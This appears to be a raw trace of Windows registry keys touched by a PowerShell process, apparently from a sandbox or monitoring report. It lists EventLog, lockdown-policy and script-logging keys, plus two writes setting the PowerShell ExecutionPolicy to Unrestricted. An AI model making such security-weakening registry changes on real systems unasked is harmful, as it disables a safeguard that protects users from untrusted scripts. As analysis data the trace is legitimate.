ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2}
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\XML
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\XML
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Std
MUI_Dlt
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_CURRENT_USER
ExecutionPolicy
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_CURRENT_USER
ExecutionPolicy
Unrestricted
REG_SZ
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
ExecutionPolicy
Unrestricted
REG_SZ
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_CURRENT_USER
ExecutionPolicy
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\DataCollection
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\DataCollection
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Std
MUI_Dlt
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
